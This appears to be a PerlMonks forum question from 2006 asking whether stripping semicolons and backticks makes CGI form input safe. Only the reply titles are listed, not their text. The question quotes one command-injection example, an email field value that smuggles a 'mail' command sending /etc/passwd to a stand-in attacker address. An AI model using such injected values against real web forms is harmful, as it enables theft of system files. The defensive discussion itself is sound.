Anonymous Monk has asked for the wisdom of the Perl Monks concerning the following question:
I've been reading up on security for cgi scripts, and completely understand and agree with the requirement for caution. However I have several form fields where the input could be pretty much anything, and all the examples of evil wrongdoing seem to be based upon insertion of line ends ; and back ticks. For example, entering an unchecked email address as: nobody@nowhere.com; mail badguys@hell.org</etc/passwd;
In instances where one input possibilities are extremely broad, is it safe simply to strip out semi colons and backticks, and if not, why not?
|
|---|
| Replies are listed 'Best First'. | |
|---|---|
|
Re: line ends,, backticks and perl security
by Bob9000 (Scribe) on Jun 04, 2006 at 09:37 UTC | |
|
Re: line ends,, backticks and perl security
by Polonius (Friar) on Jun 04, 2006 at 11:00 UTC | |
|
Re: line ends,, backticks and perl security
by graff (Chancellor) on Jun 04, 2006 at 14:24 UTC | |
|
Re: line ends,, backticks and perl security
by sgifford (Prior) on Jun 04, 2006 at 22:56 UTC | |
|
Re: line ends,, backticks and perl security
by girarde (Hermit) on Jun 05, 2006 at 21:38 UTC |